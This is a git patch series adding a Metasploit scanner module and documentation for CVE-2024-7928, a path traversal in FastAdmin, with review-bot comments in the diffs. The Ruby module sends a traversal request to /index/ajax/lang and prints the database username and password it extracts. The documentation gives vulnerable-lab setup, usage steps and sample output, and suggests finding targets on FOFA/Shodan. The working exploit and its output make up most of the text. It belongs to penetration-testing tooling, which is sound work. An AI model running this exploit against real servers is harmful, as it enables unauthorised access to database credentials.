From 9caf92e40e741915c41f8cb7c74e2c54bc002b96 Mon Sep 17 00:00:00 2001
From: Halil <90972683+Kazgangap@users.noreply.github.com>
Date: Thu, 17 Apr 2025 12:10:01 +0300
Subject: [PATCH 1/5] add fastadmin_path_traversal_cve_2024_7928.md
---
.../fastadmin_path_traversal_cve_2024_7928.md | 59 +++++++++++++++++++
1 file changed, 59 insertions(+)
create mode 100644 documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md
diff --git a/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md b/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md
new file mode 100644
index 0000000000000..0ceb8a7308896
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md
@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+This module exploits a path traversal vulnerability in FastAdmin versions up to `1.3.3.20220121`, specifically within the `/index/ajax/lang` endpoint.
+By manipulating the `lang` parameter, unauthenticated remote attackers can access arbitrary files on the server, such as configuration files containing sensitive credentials.
+The vulnerability (CVE-2024-7928) has been publicly disclosed and is fixed in version `1.3.4.20220530`.
+
+- Affected version: <= 1.3.3.20220121
+- Fixed version: 1.3.4.20220530
+- CVE: [CVE-2024-7928](https://nvd.nist.gov/vuln/detail/CVE-2024-7928)
+- Advisory: https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928
+
+## Verification Steps
+
+1. Install the vulnerable version of FastAdmin or find targets using FOFA/Shodan.
+2. Start `msfconsole`
+3. Run: `use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928`
+4. Set `RHOSTS`
+5. Run the module with `run`
+6. On success, database credentials should be printed to the console
+
+## Options
+
+```
+msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > show options
+
+Module options (auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS 192.0.2.10 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+ RPORT 80 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes The base path to FastAdmin instance
+ THREADS 1 yes The number of concurrent threads (max one per host)
+ VHOST no HTTP server virtual host
+```
+
+## Scenarios
+
+### FastAdmin 1.3.3.20220121 deployed with default configuration
+
+```
+msf6 > use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928
+msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > set RHOSTS 192.0.2.10
+rhosts => 192.0.2.10
+msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > run
+
+[+] 192.0.2.10 is vulnerable!
+[+] DB Type : mysql
+[+] Hostname :
+[+] Database : fastadmin
+[+] Username : root
+[+] Password :
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+
From fd75757562e13509a03d8aabe01ad439526cbaf0 Mon Sep 17 00:00:00 2001
From: Halil <90972683+Kazgangap@users.noreply.github.com>
Date: Thu, 17 Apr 2025 12:10:35 +0300
Subject: [PATCH 2/5] add fastadmin_path_traversal_cve_2024_7928.rb
---
.../fastadmin_path_traversal_cve_2024_7928.rb | 97 +++++++++++++++++++
1 file changed, 97 insertions(+)
create mode 100644 modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb
diff --git a/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb
new file mode 100644
index 0000000000000..e3247dcb5569d
--- /dev/null
+++ b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb
@@ -0,0 +1,97 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => 'FastAdmin Path Traversal',
+ 'Description' => %q{
+ This module exploits a path traversal vulnerability in FastAdmin versions up to 1.3.3.20220121,
+ specifically within the /index/ajax/lang endpoint. By manipulating the `lang` parameter, remote
+ attackers can traverse directories and access arbitrary files on the server, such as sensitive
+ configuration files including database credentials. This vulnerability, identified as CVE-2024-7928,
+ allows unauthenticated access and has been publicly disclosed, making it a viable target for
+ exploitation in the wild. The issue is resolved in version 1.3.4.20220530.
+ },
+ 'References' => [
+ ['CVE', '2024-7928'],
+ ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-7928'],
+ ['URL', 'https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928']
+ ],
+ 'Author' => [
+ 'Rabbit 的个人中心', # Vulnerability discovery
+ 'bigb0x', # Python script
+ 'Kazgangap' # Metasploit module
+ ],
+ 'DisclosureDate' => '2024-08-19',
+ 'License' => MSF_LICENSE,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'SideEffects' => [IOC_IN_LOGS],
+ 'Reliability' => []
+ }
+ ))
+
+ register_options([
+ Opt::RPORT(80),
+ OptString.new('TARGETURI', [true, 'The base path to FastAdmin instance', '/'])
+ ])
+ end
+
+ def run_host(ip)
+ url = normalize_uri(datastore['TARGETURI'], 'index/ajax/lang?lang=../../application/database')
+ begin
+ res = send_request_cgi({
+ 'uri' => url,
+ 'method' => 'GET',
+ 'ssl' => datastore['SSL']
+ })
+
+ unless res && res.code == 200 && res.body.include?('jsonpReturn(')
+ print_error("#{ip} is not vulnerable or did not respond as expected.")
+ return
+ end
+
+ jsonp_match = res.body.match(/jsonpReturn\((.*)\);/)
+ unless jsonp_match
+ print_error("#{ip} - Failed to find JSONP structure in response body.")
+ return
+ end
+
+ begin
+ data = JSON.parse(jsonp_match[1].strip)
+ rescue JSON::ParserError => e
+ print_error("#{ip} - Failed to parse JSONP response: #{e.message}")
+ return
+ end
+
+ unless data['username'] && data['password'] && data['database']
+ print_error("#{ip} - Required fields missing in response.")
+ return
+ end
+
+ print_good("#{ip} is vulnerable!")
+ print_good("DB Type : #{data['type']}")
+ print_good("Hostname : #{data['hostname']}")
+ print_good("Database : #{data['database']}")
+ print_good("Username : #{data['username']}")
+ print_good("Password : #{data['password']}")
+
+ report_note(
+ host: ip,
+ port: rport,
+ type: 'fastadmin.db.info',
+ data: data,
+ update: :unique_data
+ )
+ rescue ::Exception => e
+ print_error("#{ip} - Error occurred: #{e.message}")
+ end
+ end
+end
From 810ce218415bf36b215a152d6a9af392dd01716e Mon Sep 17 00:00:00 2001
From: Halil <90972683+Kazgangap@users.noreply.github.com>
Date: Thu, 17 Apr 2025 21:22:14 +0300
Subject: [PATCH 3/5] Update fastadmin_path_traversal_cve_2024_7928.rb
---
.../fastadmin_path_traversal_cve_2024_7928.rb | 147 +++++++++---------
1 file changed, 72 insertions(+), 75 deletions(-)
diff --git a/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb
index e3247dcb5569d..c952585cd0a33 100644
--- a/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb
+++ b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb
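Review bot: Every non-vulnerable or unresponsive host is reported with `print_error` in run_host (the `unless res && res.code == 200 && res.body.include?('jsonpReturn(')` branch and the missing-JSONP branch that follows), so a scan of a mostly-patched range fills the console with error lines for hosts that merely answered normally; the scanner convention is `vprint_error` (or `vprint_status`) for a negative result and `print_error` for actual failures. The same two messages survive unchanged in PATCH 3's rewrite of run_host. The `res.body.include?('jsonpReturn(')` test is also subsumed by the `match(/jsonpReturn\((.*)\);/)` a few lines later, so the first guard could shrink to `unless res && res.code == 200`, leaving the regex as the single place that decides whether a JSONP wrapper is present.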
@@ -1,97 +1,94 @@ +# frozen_string_literal: true + ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## +# Metasploit auxiliary module to exploit path traversal vulnerability (CVE-2024-7928) in FastAdmin and extract database credentials. class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize(info = {}) - super(update_info( - info, - 'Name' => 'FastAdmin Path Traversal', - 'Description' => %q{ - This module exploits a path traversal vulnerability in FastAdmin versions up to 1.3.3.20220121, - specifically within the /index/ajax/lang endpoint. By manipulating the `lang` parameter, remote - attackers can traverse directories and access arbitrary files on the server, such as sensitive - configuration files including database credentials. This vulnerability, identified as CVE-2024-7928, - allows unauthenticated access and has been publicly disclosed, making it a viable target for - exploitation in the wild. The issue is resolved in version 1.3.4.20220530. 
- }, - 'References' => [ - ['CVE', '2024-7928'], - ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-7928'], - ['URL', 'https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928'] - ], - 'Author' => [ - 'Rabbit 的个人中心', # Vulnerability discovery - 'bigb0x', # Python script - 'Kazgangap' # Metasploit module - ], - 'DisclosureDate' => '2024-08-19', - 'License' => MSF_LICENSE, - 'Notes' => { - 'Stability' => [CRASH_SAFE], - 'SideEffects' => [IOC_IN_LOGS], - 'Reliability' => [] - } - )) + super( + update_info( + info, + 'Name' => 'FastAdmin Path Traversal', + 'Description' => 'Exploits path traversal vulnerability in FastAdmin (CVE-2024-7928) affecting versions up to 1.3.3.20220121, allowing unauthorized access to sensitive files via the lang parameter.', + 'References' => [ + %w[CVE 2024-7928], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2024-7928'], + ['URL', 'https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928'] + ], + 'Author' => [ + 'Rabbit 的个人中心', # Vulnerability discovery + 'bigb0x', # Python script + 'Kazgangap' # Metasploit module + ], + 'DisclosureDate' => '2024-08-19', + 'License' => MSF_LICENSE, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'SideEffects' => [IOC_IN_LOGS], + 'Reliability' => [] + } + ) + ) - register_options([ - Opt::RPORT(80), - OptString.new('TARGETURI', [true, 'The base path to FastAdmin instance', '/']) - ]) + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to FastAdmin instance', '/']) + ] + ) end - def run_host(ip) + def run_host(host) url = normalize_uri(datastore['TARGETURI'], 'index/ajax/lang?lang=../../application/database') - begin - res = send_request_cgi({ - 'uri' => url, - 'method' => 'GET', - 'ssl' => datastore['SSL'] - }) - - unless res && res.code == 200 && res.body.include?('jsonpReturn(') - print_error("#{ip} is not vulnerable or did not respond as expected.") - return - end - jsonp_match = res.body.match(/jsonpReturn\((.*)\);/) - unless jsonp_match - print_error("#{ip} - Failed to 
find JSONP structure in response body.") - return - end + res = send_request_cgi('uri' => url, 'method' => 'GET') + unless res&.code == 200 && res.body.include?('jsonpReturn(') + print_error("#{host} is not vulnerable or did not respond as expected.") + return + end - begin - data = JSON.parse(jsonp_match[1].strip) - rescue JSON::ParserError => e - print_error("#{ip} - Failed to parse JSONP response: #{e.message}") - return - end + jsonp_match = res.body.match(/jsonpReturn\((.*)\);/) + return print_error("#{host} - Failed to find JSONP structure.") unless jsonp_match - unless data['username'] && data['password'] && data['database'] - print_error("#{ip} - Required fields missing in response.") - return - end + parse_jsonp_response(host, jsonp_match[1].strip) + rescue StandardError => e + print_error("#{host} - Error occurred: #{e.message}") + end - print_good("#{ip} is vulnerable!") - print_good("DB Type : #{data['type']}") - print_good("Hostname : #{data['hostname']}") - print_good("Database : #{data['database']}") - print_good("Username : #{data['username']}") - print_good("Password : #{data['password']}") + def parse_jsonp_response(host, jsonp_data) + data = parse_json(jsonp_data) + return unless data - report_note( - host: ip, - port: rport, - type: 'fastadmin.db.info', - data: data, - update: :unique_data - ) - rescue ::Exception => e - print_error("#{ip} - Error occurred: #{e.message}") + unless data.dig('username') && data.dig('password') && data.dig('database') + print_error("#{host} - Required fields missing in response.") + return end + + print_good("#{host} is vulnerable!") + print_good("DB Type : #{data['type']}") + print_good("Hostname : #{data['hostname']}") + print_good("Database : #{data['database']}") + print_good("Username : #{data['username']}") + print_good("Password : #{data['password']}") + + report_note( + host: host, + port: rport, + type: 'fastadmin.db.info', + data: data, + update: :unique_data + ) + end + + def parse_json(jsonp_data) + 
JSON.parse(jsonp_data) + rescue JSON::ParserError => e + print_error("Failed to parse JSONP response: #{e.message}") + nil end end From 2212ceb27d5a54e72184ca8ce0f146bb2849a6e7 Mon Sep 17 00:00:00 2001 From: Halil <90972683+Kazgangap@users.noreply.github.com> Date: Thu, 17 Apr 2025 21:23:20 +0300 Subject: [PATCH 4/5] Update fastadmin_path_traversal_cve_2024_7928.md --- .../fastadmin_path_traversal_cve_2024_7928.md | 74 +++++++++++++++++-- 1 file changed, 68 insertions(+), 6 deletions(-) diff --git a/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md b/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md index 0ceb8a7308896..85c1a8e693a39 100644 --- a/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md +++ b/documentation/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.md 
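Review bot: `parse_jsonp_response` only checks `return unless data` before indexing `data.dig('username')` (plain `data['username']` after PATCH 5's hunk), so a 200 response whose JSONP payload parses to something other than a Hash — an Array, for instance — raises TypeError, which run_host's `rescue StandardError` then reports as a generic "Error occurred" rather than a not-vulnerable result; add `return print_error("#{host} - Unexpected response structure.") unless data.is_a?(Hash)` right after the nil guard. In the same hunk `parse_json` prints `Failed to parse JSONP response: #{e.message}` without the `#{host} - ` prefix every other message carries, so in a multi-host scan that line cannot be attributed to a target; pass `host` into `parse_json` or prefix the message there. Finally, the extracted credentials are persisted only as a `fastadmin.db.info` note; recording the finding with `report_vuln` and the user/password pair with `store_valid_credential` would make it visible in the vulns and creds tables as other scanner modules do.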
@@ -9,22 +9,85 @@ The vulnerability (CVE-2024-7928) has been publicly disclosed and is fixed in ve - CVE: [CVE-2024-7928](https://nvd.nist.gov/vuln/detail/CVE-2024-7928) - Advisory: https://s4e.io/tools/fastadmin-path-traversal-cve-2024-7928 +--- + +## Target Setup + +To set up a test environment using the vulnerable version of FastAdmin: + +1. **Install Dependencies** + Ensure you have the following installed: + - PHP >= 7.1 + - MySQL or MariaDB + - Web server (Apache or Nginx) + +2. **Download Vulnerable FastAdmin Version from Official Repo** + ```bash + git clone https://github.com/fastadminnet/fastadmin.git + cd fastadmin + git checkout 1.3.3.20220121 + ``` + +3. **Move to Web Server Directory** + Copy or move the project to your web server root: + ```bash + sudo mv fastadmin /var/www/html/ + cd /var/www/html/fastadmin + ``` + +4. **Set Permissions** + ```bash + sudo chown -R www-data:www-data . + sudo chmod -R 755 . + ``` + +5. **Create Database** + Log into MySQL and run: + ```sql + CREATE DATABASE fastadmin DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci; + ``` + +6. **Configure Database Connection** + Edit `application/database.php` and set your DB credentials: + ```php + 'hostname' => '127.0.0.1', + 'database' => 'fastadmin', + 'username' => 'root', + 'password' => 'yourpassword', + ``` + +7. **Import the Database Schema** + ```bash + mysql -u root -p fastadmin < fastadmin.sql + ``` + +--- + ## Verification Steps 1. Install the vulnerable version of FastAdmin or find targets using FOFA/Shodan. 2. Start `msfconsole` -3. Run: `use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928` -4. Set `RHOSTS` +3. Run: + ``` + use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928 + ``` +4. Set `RHOSTS` and `RPORT` + ``` + set RHOSTS 192.0.2.10 + set RPORT 80 # Or the port you are targeting + + ``` 5. Run the module with `run` 6. 
On success, database credentials should be printed to the console +--- + ## Options ``` msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > show options Module options (auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928): - Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] @@ -36,6 +99,8 @@ Module options (auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928): VHOST no HTTP server virtual host ``` +--- + ## Scenarios ### FastAdmin 1.3.3.20220121 deployed with default configuration @@ -45,7 +110,6 @@ msf6 > use auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928 msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > set RHOSTS 192.0.2.10 rhosts => 192.0.2.10 msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > run - [+] 192.0.2.10 is vulnerable! [+] DB Type : mysql [+] Hostname : @@ -55,5 +119,3 @@ msf6 auxiliary(scanner/http/fastadmin_path_traversal_cve_2024_7928) > run [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ``` - - From fbda845e783c9b85ce00e8751b0c4103fbebaf62 Mon Sep 17 00:00:00 2001 From: Diego Ledda Date: Mon, 28 Apr 2025 10:23:50 +0200 Subject: [PATCH 5/5] chore: reverted suggestion to fix rubocop --- .../scanner/http/fastadmin_path_traversal_cve_2024_7928.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb index c952585cd0a33..11afd920534c9 100644 --- a/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb +++ b/modules/auxiliary/scanner/http/fastadmin_path_traversal_cve_2024_7928.rb 
@@ -64,7 +64,7 @@ def parse_jsonp_response(host, jsonp_data) data = parse_json(jsonp_data) return unless data - unless data.dig('username') && data.dig('password') && data.dig('database') + unless data['username'] && data['password'] && data['database'] print_error("#{host} - Required fields missing in response.") return end